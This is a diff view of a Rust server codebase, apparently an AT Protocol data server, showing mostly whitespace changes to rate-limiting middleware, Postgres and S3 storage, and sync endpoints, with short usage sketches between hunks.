}
170
+
171
pub async fn oauth_token_rate_limit(
172
ConnectInfo(addr): ConnectInfo<SocketAddr>,
173
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
175
next: Next,
176
) -> Response {
177
let client_ip = extract_client_ip(request.headers(), Some(addr));
178
+
179
if limiters.oauth_token.check_key(&client_ip).is_err() {
180
tracing::warn!(ip = %client_ip, "OAuth token rate limit exceeded");
181
return rate_limit_response();
182
}
183
+
184
next.run(request).await
185
}
186
+
187
pub async fn password_reset_rate_limit(
188
ConnectInfo(addr): ConnectInfo<SocketAddr>,
189
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
191
next: Next,
192
) -> Response {
193
let client_ip = extract_client_ip(request.headers(), Some(addr));
194
+
195
if limiters.password_reset.check_key(&client_ip).is_err() {
196
tracing::warn!(ip = %client_ip, "Password reset rate limit exceeded");
197
return rate_limit_response();
198
}
199
+
200
next.run(request).await
201
}
202
+
203
pub async fn account_creation_rate_limit(
204
ConnectInfo(addr): ConnectInfo<SocketAddr>,
205
axum::extract::State(limiters): axum::extract::State<Arc<RateLimiters>>,
···
207
next: Next,
208
) -> Response {
209
let client_ip = extract_client_ip(request.headers(), Some(addr));
210
+
211
if limiters.account_creation.check_key(&client_ip).is_err() {
212
tracing::warn!(ip = %client_ip, "Account creation rate limit exceeded");
213
return rate_limit_response();
214
}
215
+
216
next.run(request).await
217
}
218
+
219
#[cfg(test)]
220
mod tests {
221
use super::*;
222
+
223
#[test]
224
fn test_rate_limiters_creation() {
225
let limiters = RateLimiters::new();
226
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
227
}
228
+
229
#[test]
230
fn test_rate_limiter_exhaustion() {
231
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(2).unwrap()));
232
let key = "test_ip".to_string();
233
+
234
assert!(limiter.check_key(&key).is_ok());
235
assert!(limiter.check_key(&key).is_ok());
236
assert!(limiter.check_key(&key).is_err());
237
}
238
+
239
#[test]
240
fn test_different_keys_have_separate_limits() {
241
let limiter = RateLimiter::keyed(Quota::per_minute(NonZeroU32::new(1).unwrap()));
242
+
243
assert!(limiter.check_key(&"ip1".to_string()).is_ok());
244
assert!(limiter.check_key(&"ip1".to_string()).is_err());
245
assert!(limiter.check_key(&"ip2".to_string()).is_ok());
246
}
247
+
248
#[test]
249
fn test_builder_pattern() {
250
let limiters = RateLimiters::new()
···
252
.with_oauth_token_limit(60)
253
.with_password_reset_limit(3)
254
.with_account_creation_limit(5);
255
+
256
assert!(limiters.login.check_key(&"test".to_string()).is_ok());
257
}
258
}
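As a usage note for the builder methods above, the keyed limiters can be tuned per deployment and checked against whatever key `extract_client_ip` yields. A small sketch, with illustrative limit values:

```rust
use axum::http::HeaderMap;

use crate::rate_limit::{extract_client_ip, RateLimiters};

fn custom_limiters() -> RateLimiters {
    RateLimiters::new()
        .with_login_limit(5)            // 5 login attempts per minute per key
        .with_password_reset_limit(3)   // 3 reset requests per hour per key
        .with_account_creation_limit(2) // 2 sign-ups per hour per key
}

fn login_allowed(headers: &HeaderMap) -> bool {
    let limiters = custom_limiters();
    // With no socket address available this falls back to the proxy headers,
    // and finally to the literal key "unknown".
    let client_ip = extract_client_ip(headers, None);
    limiters.login.check_key(&client_ip).is_ok()
}
```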
+9
src/repo/mod.rs
···
6
use multihash::Multihash;
7
use sha2::{Digest, Sha256};
8
use sqlx::PgPool;
9
pub mod tracking;
10
#[derive(Clone)]
11
pub struct PostgresBlockStore {
12
pool: PgPool,
13
}
14
impl PostgresBlockStore {
15
pub fn new(pool: PgPool) -> Self {
16
Self { pool }
17
}
18
}
19
impl BlockStore for PostgresBlockStore {
20
async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> {
21
crate::metrics::record_block_operation("get");
···
29
None => Ok(None),
30
}
31
}
32
async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> {
33
crate::metrics::record_block_operation("put");
34
let mut hasher = Sha256::new();
···
44
.map_err(|e| RepoError::storage(e))?;
45
Ok(cid)
46
}
47
async fn has(&self, cid: &Cid) -> Result<bool, RepoError> {
48
crate::metrics::record_block_operation("has");
49
let cid_bytes = cid.to_bytes();
···
53
.map_err(|e| RepoError::storage(e))?;
54
Ok(row.is_some())
55
}
56
async fn put_many(
57
&self,
58
blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send,
···
78
.map_err(|e| RepoError::storage(e))?;
79
Ok(())
80
}
81
async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> {
82
if cids.is_empty() {
83
return Ok(Vec::new());
···
101
.collect();
102
Ok(results)
103
}
104
async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> {
105
self.put_many(commit.blocks).await?;
106
Ok(())
···
6
use multihash::Multihash;
7
use sha2::{Digest, Sha256};
8
use sqlx::PgPool;
9
+
10
pub mod tracking;
11
+
12
#[derive(Clone)]
13
pub struct PostgresBlockStore {
14
pool: PgPool,
15
}
16
+
17
impl PostgresBlockStore {
18
pub fn new(pool: PgPool) -> Self {
19
Self { pool }
20
}
21
}
22
+
23
impl BlockStore for PostgresBlockStore {
24
async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> {
25
crate::metrics::record_block_operation("get");
···
33
None => Ok(None),
34
}
35
}
36
+
37
async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> {
38
crate::metrics::record_block_operation("put");
39
let mut hasher = Sha256::new();
···
49
.map_err(|e| RepoError::storage(e))?;
50
Ok(cid)
51
}
52
+
53
async fn has(&self, cid: &Cid) -> Result<bool, RepoError> {
54
crate::metrics::record_block_operation("has");
55
let cid_bytes = cid.to_bytes();
···
59
.map_err(|e| RepoError::storage(e))?;
60
Ok(row.is_some())
61
}
62
+
63
async fn put_many(
64
&self,
65
blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send,
···
85
.map_err(|e| RepoError::storage(e))?;
86
Ok(())
87
}
88
+
89
async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> {
90
if cids.is_empty() {
91
return Ok(Vec::new());
···
109
.collect();
110
Ok(results)
111
}
112
+
113
async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> {
114
self.put_many(commit.blocks).await?;
115
Ok(())
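A short sketch of the `BlockStore` round trip that `PostgresBlockStore` provides. It assumes an already-connected `PgPool` and that `RepoError` (a `jacquard_repo` type) converts into `anyhow::Error`; both are assumptions rather than facts from this diff:

```rust
use jacquard_repo::storage::BlockStore;
use sqlx::PgPool;

use crate::repo::PostgresBlockStore;

async fn block_round_trip(pool: PgPool) -> anyhow::Result<()> {
    let store = PostgresBlockStore::new(pool);

    // put() hashes the bytes with SHA-256 and returns the derived CID.
    let cid = store.put(b"hello block").await?;
    assert!(store.has(&cid).await?);

    let bytes = store.get(&cid).await?.expect("block written above");
    assert_eq!(&bytes[..], b"hello block");
    Ok(())
}
```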
+11
src/repo/tracking.rs
···
6
use jacquard_repo::storage::BlockStore;
7
use std::collections::HashSet;
8
use std::sync::{Arc, Mutex};
9
#[derive(Clone)]
10
pub struct TrackingBlockStore {
11
inner: PostgresBlockStore,
12
written_cids: Arc<Mutex<Vec<Cid>>>,
13
read_cids: Arc<Mutex<HashSet<Cid>>>,
14
}
15
impl TrackingBlockStore {
16
pub fn new(store: PostgresBlockStore) -> Self {
17
Self {
···
20
read_cids: Arc::new(Mutex::new(HashSet::new())),
21
}
22
}
23
pub fn get_written_cids(&self) -> Vec<Cid> {
24
match self.written_cids.lock() {
25
Ok(guard) => guard.clone(),
26
Err(poisoned) => poisoned.into_inner().clone(),
27
}
28
}
29
pub fn get_read_cids(&self) -> Vec<Cid> {
30
match self.read_cids.lock() {
31
Ok(guard) => guard.iter().cloned().collect(),
32
Err(poisoned) => poisoned.into_inner().iter().cloned().collect(),
33
}
34
}
35
pub fn get_all_relevant_cids(&self) -> Vec<Cid> {
36
let written = self.get_written_cids();
37
let read = self.get_read_cids();
···
40
all.into_iter().collect()
41
}
42
}
43
impl BlockStore for TrackingBlockStore {
44
async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> {
45
let result = self.inner.get(cid).await?;
···
51
}
52
Ok(result)
53
}
54
async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> {
55
let cid = self.inner.put(data).await?;
56
match self.written_cids.lock() {
···
59
}
60
Ok(cid)
61
}
62
async fn has(&self, cid: &Cid) -> Result<bool, RepoError> {
63
self.inner.has(cid).await
64
}
65
async fn put_many(
66
&self,
67
blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send,
···
75
}
76
Ok(())
77
}
78
async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> {
79
let results = self.inner.get_many(cids).await?;
80
for (cid, result) in cids.iter().zip(results.iter()) {
···
87
}
88
Ok(results)
89
}
90
async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> {
91
self.put_many(commit.blocks).await?;
92
Ok(())
···
6
use jacquard_repo::storage::BlockStore;
7
use std::collections::HashSet;
8
use std::sync::{Arc, Mutex};
9
+
10
#[derive(Clone)]
11
pub struct TrackingBlockStore {
12
inner: PostgresBlockStore,
13
written_cids: Arc<Mutex<Vec<Cid>>>,
14
read_cids: Arc<Mutex<HashSet<Cid>>>,
15
}
16
+
17
impl TrackingBlockStore {
18
pub fn new(store: PostgresBlockStore) -> Self {
19
Self {
···
22
read_cids: Arc::new(Mutex::new(HashSet::new())),
23
}
24
}
25
+
26
pub fn get_written_cids(&self) -> Vec<Cid> {
27
match self.written_cids.lock() {
28
Ok(guard) => guard.clone(),
29
Err(poisoned) => poisoned.into_inner().clone(),
30
}
31
}
32
+
33
pub fn get_read_cids(&self) -> Vec<Cid> {
34
match self.read_cids.lock() {
35
Ok(guard) => guard.iter().cloned().collect(),
36
Err(poisoned) => poisoned.into_inner().iter().cloned().collect(),
37
}
38
}
39
+
40
pub fn get_all_relevant_cids(&self) -> Vec<Cid> {
41
let written = self.get_written_cids();
42
let read = self.get_read_cids();
···
45
all.into_iter().collect()
46
}
47
}
48
+
49
impl BlockStore for TrackingBlockStore {
50
async fn get(&self, cid: &Cid) -> Result<Option<Bytes>, RepoError> {
51
let result = self.inner.get(cid).await?;
···
57
}
58
Ok(result)
59
}
60
+
61
async fn put(&self, data: &[u8]) -> Result<Cid, RepoError> {
62
let cid = self.inner.put(data).await?;
63
match self.written_cids.lock() {
···
66
}
67
Ok(cid)
68
}
69
+
70
async fn has(&self, cid: &Cid) -> Result<bool, RepoError> {
71
self.inner.has(cid).await
72
}
73
+
74
async fn put_many(
75
&self,
76
blocks: impl IntoIterator<Item = (Cid, Bytes)> + Send,
···
84
}
85
Ok(())
86
}
87
+
88
async fn get_many(&self, cids: &[Cid]) -> Result<Vec<Option<Bytes>>, RepoError> {
89
let results = self.inner.get_many(cids).await?;
90
for (cid, result) in cids.iter().zip(results.iter()) {
···
97
}
98
Ok(results)
99
}
100
+
101
async fn apply_commit(&self, commit: CommitData) -> Result<(), RepoError> {
102
self.put_many(commit.blocks).await?;
103
Ok(())
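The tracking wrapper is easiest to see end to end: it forwards every call to the inner `PostgresBlockStore` while recording which CIDs were read or written, and callers collect the lists afterwards. A minimal sketch, again assuming a connected `PgPool`:

```rust
use jacquard_repo::storage::BlockStore;
use sqlx::PgPool;

use crate::repo::{tracking::TrackingBlockStore, PostgresBlockStore};

async fn tracked_write(pool: PgPool) -> anyhow::Result<()> {
    let store = TrackingBlockStore::new(PostgresBlockStore::new(pool));

    let cid = store.put(b"tracked block").await?;
    let _ = store.get(&cid).await?;

    // Reads and writes are recorded behind Arc<Mutex<..>>, so clones of the
    // store share the same lists; the CID shows up in both views below.
    assert!(store.get_written_cids().contains(&cid));
    assert!(store.get_all_relevant_cids().contains(&cid));
    Ok(())
}
```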
+16
src/state.rs
···
8
use sqlx::PgPool;
9
use std::sync::Arc;
10
use tokio::sync::broadcast;
11
#[derive(Clone)]
12
pub struct AppState {
13
pub db: PgPool,
···
19
pub cache: Arc<dyn Cache>,
20
pub distributed_rate_limiter: Arc<dyn DistributedRateLimiter>,
21
}
22
pub enum RateLimitKind {
23
Login,
24
AccountCreation,
···
32
AppPassword,
33
EmailUpdate,
34
}
35
impl RateLimitKind {
36
fn key_prefix(&self) -> &'static str {
37
match self {
···
48
Self::EmailUpdate => "email_update",
49
}
50
}
51
fn limit_and_window_ms(&self) -> (u32, u64) {
52
match self {
53
Self::Login => (10, 60_000),
···
64
}
65
}
66
}
67
impl AppState {
68
pub async fn new(db: PgPool) -> Self {
69
AuthConfig::init();
70
let block_store = PostgresBlockStore::new(db.clone());
71
let blob_store = S3BlobStorage::new().await;
72
let firehose_buffer_size: usize = std::env::var("FIREHOSE_BUFFER_SIZE")
73
.ok()
74
.and_then(|v| v.parse().ok())
75
.unwrap_or(10000);
76
let (firehose_tx, _) = broadcast::channel(firehose_buffer_size);
77
let rate_limiters = Arc::new(RateLimiters::new());
78
let circuit_breakers = Arc::new(CircuitBreakers::new());
79
let (cache, distributed_rate_limiter) = create_cache().await;
80
Self {
81
db,
82
block_store,
···
88
distributed_rate_limiter,
89
}
90
}
91
pub fn with_rate_limiters(mut self, rate_limiters: RateLimiters) -> Self {
92
self.rate_limiters = Arc::new(rate_limiters);
93
self
94
}
95
pub fn with_circuit_breakers(mut self, circuit_breakers: CircuitBreakers) -> Self {
96
self.circuit_breakers = Arc::new(circuit_breakers);
97
self
98
}
99
pub async fn check_rate_limit(&self, kind: RateLimitKind, client_ip: &str) -> bool {
100
if std::env::var("DISABLE_RATE_LIMITING").is_ok() {
101
return true;
102
}
103
let key = format!("{}:{}", kind.key_prefix(), client_ip);
104
let limiter_name = kind.key_prefix();
105
let (limit, window_ms) = kind.limit_and_window_ms();
106
if !self.distributed_rate_limiter.check_rate_limit(&key, limit, window_ms).await {
107
crate::metrics::record_rate_limit_rejection(limiter_name);
108
return false;
109
}
110
let limiter = match kind {
111
RateLimitKind::Login => &self.rate_limiters.login,
112
RateLimitKind::AccountCreation => &self.rate_limiters.account_creation,
···
120
RateLimitKind::AppPassword => &self.rate_limiters.app_password,
121
RateLimitKind::EmailUpdate => &self.rate_limiters.email_update,
122
};
123
let ok = limiter.check_key(&client_ip.to_string()).is_ok();
124
if !ok {
125
crate::metrics::record_rate_limit_rejection(limiter_name);
···
8
use sqlx::PgPool;
9
use std::sync::Arc;
10
use tokio::sync::broadcast;
11
+
12
#[derive(Clone)]
13
pub struct AppState {
14
pub db: PgPool,
···
20
pub cache: Arc<dyn Cache>,
21
pub distributed_rate_limiter: Arc<dyn DistributedRateLimiter>,
22
}
23
+
24
pub enum RateLimitKind {
25
Login,
26
AccountCreation,
···
34
AppPassword,
35
EmailUpdate,
36
}
37
+
38
impl RateLimitKind {
39
fn key_prefix(&self) -> &'static str {
40
match self {
···
51
Self::EmailUpdate => "email_update",
52
}
53
}
54
+
55
fn limit_and_window_ms(&self) -> (u32, u64) {
56
match self {
57
Self::Login => (10, 60_000),
···
68
}
69
}
70
}
71
+
72
impl AppState {
73
pub async fn new(db: PgPool) -> Self {
74
AuthConfig::init();
75
+
76
let block_store = PostgresBlockStore::new(db.clone());
77
let blob_store = S3BlobStorage::new().await;
78
+
79
let firehose_buffer_size: usize = std::env::var("FIREHOSE_BUFFER_SIZE")
80
.ok()
81
.and_then(|v| v.parse().ok())
82
.unwrap_or(10000);
83
+
84
let (firehose_tx, _) = broadcast::channel(firehose_buffer_size);
85
let rate_limiters = Arc::new(RateLimiters::new());
86
let circuit_breakers = Arc::new(CircuitBreakers::new());
87
let (cache, distributed_rate_limiter) = create_cache().await;
88
+
89
Self {
90
db,
91
block_store,
···
97
distributed_rate_limiter,
98
}
99
}
100
+
101
pub fn with_rate_limiters(mut self, rate_limiters: RateLimiters) -> Self {
102
self.rate_limiters = Arc::new(rate_limiters);
103
self
104
}
105
+
106
pub fn with_circuit_breakers(mut self, circuit_breakers: CircuitBreakers) -> Self {
107
self.circuit_breakers = Arc::new(circuit_breakers);
108
self
109
}
110
+
111
pub async fn check_rate_limit(&self, kind: RateLimitKind, client_ip: &str) -> bool {
112
if std::env::var("DISABLE_RATE_LIMITING").is_ok() {
113
return true;
114
}
115
+
116
let key = format!("{}:{}", kind.key_prefix(), client_ip);
117
let limiter_name = kind.key_prefix();
118
let (limit, window_ms) = kind.limit_and_window_ms();
119
+
120
if !self.distributed_rate_limiter.check_rate_limit(&key, limit, window_ms).await {
121
crate::metrics::record_rate_limit_rejection(limiter_name);
122
return false;
123
}
124
+
125
let limiter = match kind {
126
RateLimitKind::Login => &self.rate_limiters.login,
127
RateLimitKind::AccountCreation => &self.rate_limiters.account_creation,
···
135
RateLimitKind::AppPassword => &self.rate_limiters.app_password,
136
RateLimitKind::EmailUpdate => &self.rate_limiters.email_update,
137
};
138
+
139
let ok = limiter.check_key(&client_ip.to_string()).is_ok();
140
if !ok {
141
crate::metrics::record_rate_limit_rejection(limiter_name);
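For handlers that are not wrapped by the middleware in `src/rate_limit.rs`, `check_rate_limit` can be called directly; it consults the distributed limiter first, then the in-memory one, and honours `DISABLE_RATE_LIMITING`. A sketch with an illustrative handler name and response:

```rust
use std::net::SocketAddr;

use axum::{
    extract::{ConnectInfo, State},
    http::{HeaderMap, StatusCode},
    response::IntoResponse,
};

use crate::rate_limit::extract_client_ip;
use crate::state::{AppState, RateLimitKind};

pub async fn create_account(
    State(state): State<AppState>,
    ConnectInfo(addr): ConnectInfo<SocketAddr>,
    headers: HeaderMap,
) -> impl IntoResponse {
    let client_ip = extract_client_ip(&headers, Some(addr));

    // Both the distributed and the in-memory limiter must allow the request.
    if !state.check_rate_limit(RateLimitKind::AccountCreation, &client_ip).await {
        return StatusCode::TOO_MANY_REQUESTS;
    }

    StatusCode::OK
}
```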
+19
-1
src/storage/mod.rs
···
5
use aws_sdk_s3::primitives::ByteStream;
6
use bytes::Bytes;
7
use thiserror::Error;
8
#[derive(Error, Debug)]
9
pub enum StorageError {
10
#[error("IO error: {0}")]
···
14
#[error("Other: {0}")]
15
Other(String),
16
}
17
#[async_trait]
18
pub trait BlobStorage: Send + Sync {
19
async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError>;
···
22
async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError>;
23
async fn delete(&self, key: &str) -> Result<(), StorageError>;
24
}
25
pub struct S3BlobStorage {
26
client: Client,
27
bucket: String,
28
}
29
impl S3BlobStorage {
30
pub async fn new() -> Self {
31
-
// heheheh
32
let region_provider = RegionProviderChain::default_provider().or_else("us-east-1");
33
let config = aws_config::defaults(BehaviorVersion::latest())
34
.region(region_provider)
35
.load()
36
.await;
37
let bucket = std::env::var("S3_BUCKET").expect("S3_BUCKET must be set");
38
let client = if let Ok(endpoint) = std::env::var("S3_ENDPOINT") {
39
let s3_config = aws_sdk_s3::config::Builder::from(&config)
40
.endpoint_url(endpoint)
···
44
} else {
45
Client::new(&config)
46
};
47
Self { client, bucket }
48
}
49
}
50
#[async_trait]
51
impl BlobStorage for S3BlobStorage {
52
async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError> {
53
self.put_bytes(key, Bytes::copy_from_slice(data)).await
54
}
55
async fn put_bytes(&self, key: &str, data: Bytes) -> Result<(), StorageError> {
56
let result = self.client
57
.put_object()
···
61
.send()
62
.await
63
.map_err(|e| StorageError::S3(e.to_string()));
64
match &result {
65
Ok(_) => crate::metrics::record_s3_operation("put", "success"),
66
Err(_) => crate::metrics::record_s3_operation("put", "error"),
67
}
68
result?;
69
Ok(())
70
}
71
async fn get(&self, key: &str) -> Result<Vec<u8>, StorageError> {
72
self.get_bytes(key).await.map(|b| b.to_vec())
73
}
74
async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError> {
75
let resp = self
76
.client
···
83
crate::metrics::record_s3_operation("get", "error");
84
StorageError::S3(e.to_string())
85
})?;
86
let data = resp
87
.body
88
.collect()
···
92
StorageError::S3(e.to_string())
93
})?
94
.into_bytes();
95
crate::metrics::record_s3_operation("get", "success");
96
Ok(data)
97
}
98
async fn delete(&self, key: &str) -> Result<(), StorageError> {
99
let result = self.client
100
.delete_object()
···
103
.send()
104
.await
105
.map_err(|e| StorageError::S3(e.to_string()));
106
match &result {
107
Ok(_) => crate::metrics::record_s3_operation("delete", "success"),
108
Err(_) => crate::metrics::record_s3_operation("delete", "error"),
109
}
110
result?;
111
Ok(())
112
}
···
5
use aws_sdk_s3::primitives::ByteStream;
6
use bytes::Bytes;
7
use thiserror::Error;
8
+
9
#[derive(Error, Debug)]
10
pub enum StorageError {
11
#[error("IO error: {0}")]
···
15
#[error("Other: {0}")]
16
Other(String),
17
}
18
+
19
#[async_trait]
20
pub trait BlobStorage: Send + Sync {
21
async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError>;
···
24
async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError>;
25
async fn delete(&self, key: &str) -> Result<(), StorageError>;
26
}
27
+
28
pub struct S3BlobStorage {
29
client: Client,
30
bucket: String,
31
}
32
+
33
impl S3BlobStorage {
34
pub async fn new() -> Self {
35
let region_provider = RegionProviderChain::default_provider().or_else("us-east-1");
36
+
37
let config = aws_config::defaults(BehaviorVersion::latest())
38
.region(region_provider)
39
.load()
40
.await;
41
+
42
let bucket = std::env::var("S3_BUCKET").expect("S3_BUCKET must be set");
43
+
44
let client = if let Ok(endpoint) = std::env::var("S3_ENDPOINT") {
45
let s3_config = aws_sdk_s3::config::Builder::from(&config)
46
.endpoint_url(endpoint)
···
50
} else {
51
Client::new(&config)
52
};
53
+
54
Self { client, bucket }
55
}
56
}
57
+
58
#[async_trait]
59
impl BlobStorage for S3BlobStorage {
60
async fn put(&self, key: &str, data: &[u8]) -> Result<(), StorageError> {
61
self.put_bytes(key, Bytes::copy_from_slice(data)).await
62
}
63
+
64
async fn put_bytes(&self, key: &str, data: Bytes) -> Result<(), StorageError> {
65
let result = self.client
66
.put_object()
···
70
.send()
71
.await
72
.map_err(|e| StorageError::S3(e.to_string()));
73
+
74
match &result {
75
Ok(_) => crate::metrics::record_s3_operation("put", "success"),
76
Err(_) => crate::metrics::record_s3_operation("put", "error"),
77
}
78
+
79
result?;
80
Ok(())
81
}
82
+
83
async fn get(&self, key: &str) -> Result<Vec<u8>, StorageError> {
84
self.get_bytes(key).await.map(|b| b.to_vec())
85
}
86
+
87
async fn get_bytes(&self, key: &str) -> Result<Bytes, StorageError> {
88
let resp = self
89
.client
···
96
crate::metrics::record_s3_operation("get", "error");
97
StorageError::S3(e.to_string())
98
})?;
99
+
100
let data = resp
101
.body
102
.collect()
···
106
StorageError::S3(e.to_string())
107
})?
108
.into_bytes();
109
+
110
crate::metrics::record_s3_operation("get", "success");
111
Ok(data)
112
}
113
+
114
async fn delete(&self, key: &str) -> Result<(), StorageError> {
115
let result = self.client
116
.delete_object()
···
119
.send()
120
.await
121
.map_err(|e| StorageError::S3(e.to_string()));
122
+
123
match &result {
124
Ok(_) => crate::metrics::record_s3_operation("delete", "success"),
125
Err(_) => crate::metrics::record_s3_operation("delete", "error"),
126
}
127
+
128
result?;
129
Ok(())
130
}
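A sketch of the blob round trip through the `BlobStorage` trait above; it requires `S3_BUCKET` in the environment (and optionally `S3_ENDPOINT` for S3-compatible object stores), and the key used here is illustrative:

```rust
use crate::storage::{BlobStorage, S3BlobStorage, StorageError};

async fn blob_round_trip() -> Result<(), StorageError> {
    // Panics if S3_BUCKET is unset, per S3BlobStorage::new above.
    let storage = S3BlobStorage::new().await;

    storage.put("blobs/example-key", b"hello blob").await?;
    let bytes = storage.get_bytes("blobs/example-key").await?;
    assert_eq!(&bytes[..], b"hello blob");

    storage.delete("blobs/example-key").await?;
    Ok(())
}
```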
+5
src/sync/blob.rs
···
10
use serde::{Deserialize, Serialize};
11
use serde_json::json;
12
use tracing::error;
13
#[derive(Deserialize)]
14
pub struct GetBlobParams {
15
pub did: String,
16
pub cid: String,
17
}
18
pub async fn get_blob(
19
State(state): State<AppState>,
20
Query(params): Query<GetBlobParams>,
···
94
}
95
}
96
}
97
#[derive(Deserialize)]
98
pub struct ListBlobsParams {
99
pub did: String,
···
101
pub limit: Option<i64>,
102
pub cursor: Option<String>,
103
}
104
#[derive(Serialize)]
105
pub struct ListBlobsOutput {
106
pub cursor: Option<String>,
107
pub cids: Vec<String>,
108
}
109
pub async fn list_blobs(
110
State(state): State<AppState>,
111
Query(params): Query<ListBlobsParams>,
···
10
use serde::{Deserialize, Serialize};
11
use serde_json::json;
12
use tracing::error;
13
+
14
#[derive(Deserialize)]
15
pub struct GetBlobParams {
16
pub did: String,
17
pub cid: String,
18
}
19
+
20
pub async fn get_blob(
21
State(state): State<AppState>,
22
Query(params): Query<GetBlobParams>,
···
96
}
97
}
98
}
99
+
100
#[derive(Deserialize)]
101
pub struct ListBlobsParams {
102
pub did: String,
···
104
pub limit: Option<i64>,
105
pub cursor: Option<String>,
106
}
107
+
108
#[derive(Serialize)]
109
pub struct ListBlobsOutput {
110
pub cursor: Option<String>,
111
pub cids: Vec<String>,
112
}
113
+
114
pub async fn list_blobs(
115
State(state): State<AppState>,
116
Query(params): Query<ListBlobsParams>,
+3
src/sync/car.rs
···
1
use cid::Cid;
2
use iroh_car::CarHeader;
3
use std::io::Write;
4
pub fn write_varint<W: Write>(mut writer: W, mut value: u64) -> std::io::Result<()> {
5
loop {
6
let mut byte = (value & 0x7F) as u8;
···
15
}
16
Ok(())
17
}
18
pub fn ld_write<W: Write>(mut writer: W, data: &[u8]) -> std::io::Result<()> {
19
write_varint(&mut writer, data.len() as u64)?;
20
writer.write_all(data)?;
21
Ok(())
22
}
23
pub fn encode_car_header(root_cid: &Cid) -> Result<Vec<u8>, String> {
24
let header = CarHeader::new_v1(vec![root_cid.clone()]);
25
let header_cbor = header.encode().map_err(|e| format!("Failed to encode CAR header: {:?}", e))?;
···
1
use cid::Cid;
2
use iroh_car::CarHeader;
3
use std::io::Write;
4
+
5
pub fn write_varint<W: Write>(mut writer: W, mut value: u64) -> std::io::Result<()> {
6
loop {
7
let mut byte = (value & 0x7F) as u8;
···
16
}
17
Ok(())
18
}
19
+
20
pub fn ld_write<W: Write>(mut writer: W, data: &[u8]) -> std::io::Result<()> {
21
write_varint(&mut writer, data.len() as u64)?;
22
writer.write_all(data)?;
23
Ok(())
24
}
25
+
26
pub fn encode_car_header(root_cid: &Cid) -> Result<Vec<u8>, String> {
27
let header = CarHeader::new_v1(vec![root_cid.clone()]);
28
let header_cbor = header.encode().map_err(|e| format!("Failed to encode CAR header: {:?}", e))?;
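The two helpers above implement CAR framing: an unsigned varint (LEB128) length prefix followed by a section's raw bytes. A tiny sketch of how they compose, assuming the module is exposed as `crate::sync::car`:

```rust
use crate::sync::car::{ld_write, write_varint};

// Frames one CAR section: varint length prefix, then the bytes.
fn frame_section(payload: &[u8]) -> std::io::Result<Vec<u8>> {
    let mut out = Vec::new();
    ld_write(&mut out, payload)?; // equivalent to write_varint(len) + the raw bytes
    Ok(out)
}

// The prefix on its own, e.g. when the bytes are streamed separately.
fn length_prefix(len: u64) -> std::io::Result<Vec<u8>> {
    let mut out = Vec::new();
    write_varint(&mut out, len)?;
    Ok(out)
}
```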
+11
src/sync/commit.rs
···
12
use serde_json::json;
13
use std::str::FromStr;
14
use tracing::error;
15
async fn get_rev_from_commit(state: &AppState, cid_str: &str) -> Option<String> {
16
let cid = Cid::from_str(cid_str).ok()?;
17
let block = state.block_store.get(&cid).await.ok()??;
18
let commit = Commit::from_cbor(&block).ok()?;
19
Some(commit.rev().to_string())
20
}
21
#[derive(Deserialize)]
22
pub struct GetLatestCommitParams {
23
pub did: String,
24
}
25
#[derive(Serialize)]
26
pub struct GetLatestCommitOutput {
27
pub cid: String,
28
pub rev: String,
29
}
30
pub async fn get_latest_commit(
31
State(state): State<AppState>,
32
Query(params): Query<GetLatestCommitParams>,
···
78
}
79
}
80
}
81
#[derive(Deserialize)]
82
pub struct ListReposParams {
83
pub limit: Option<i64>,
84
pub cursor: Option<String>,
85
}
86
#[derive(Serialize)]
87
#[serde(rename_all = "camelCase")]
88
pub struct RepoInfo {
···
91
pub rev: String,
92
pub active: bool,
93
}
94
#[derive(Serialize)]
95
pub struct ListReposOutput {
96
pub cursor: Option<String>,
97
pub repos: Vec<RepoInfo>,
98
}
99
pub async fn list_repos(
100
State(state): State<AppState>,
101
Query(params): Query<ListReposParams>,
···
154
}
155
}
156
}
157
#[derive(Deserialize)]
158
pub struct GetRepoStatusParams {
159
pub did: String,
160
}
161
#[derive(Serialize)]
162
pub struct GetRepoStatusOutput {
163
pub did: String,
164
pub active: bool,
165
pub rev: Option<String>,
166
}
167
pub async fn get_repo_status(
168
State(state): State<AppState>,
169
Query(params): Query<GetRepoStatusParams>,
···
12
use serde_json::json;
13
use std::str::FromStr;
14
use tracing::error;
15
+
16
async fn get_rev_from_commit(state: &AppState, cid_str: &str) -> Option<String> {
17
let cid = Cid::from_str(cid_str).ok()?;
18
let block = state.block_store.get(&cid).await.ok()??;
19
let commit = Commit::from_cbor(&block).ok()?;
20
Some(commit.rev().to_string())
21
}
22
+
23
#[derive(Deserialize)]
24
pub struct GetLatestCommitParams {
25
pub did: String,
26
}
27
+
28
#[derive(Serialize)]
29
pub struct GetLatestCommitOutput {
30
pub cid: String,
31
pub rev: String,
32
}
33
+
34
pub async fn get_latest_commit(
35
State(state): State<AppState>,
36
Query(params): Query<GetLatestCommitParams>,
···
82
}
83
}
84
}
85
+
86
#[derive(Deserialize)]
87
pub struct ListReposParams {
88
pub limit: Option<i64>,
89
pub cursor: Option<String>,
90
}
91
+
92
#[derive(Serialize)]
93
#[serde(rename_all = "camelCase")]
94
pub struct RepoInfo {
···
97
pub rev: String,
98
pub active: bool,
99
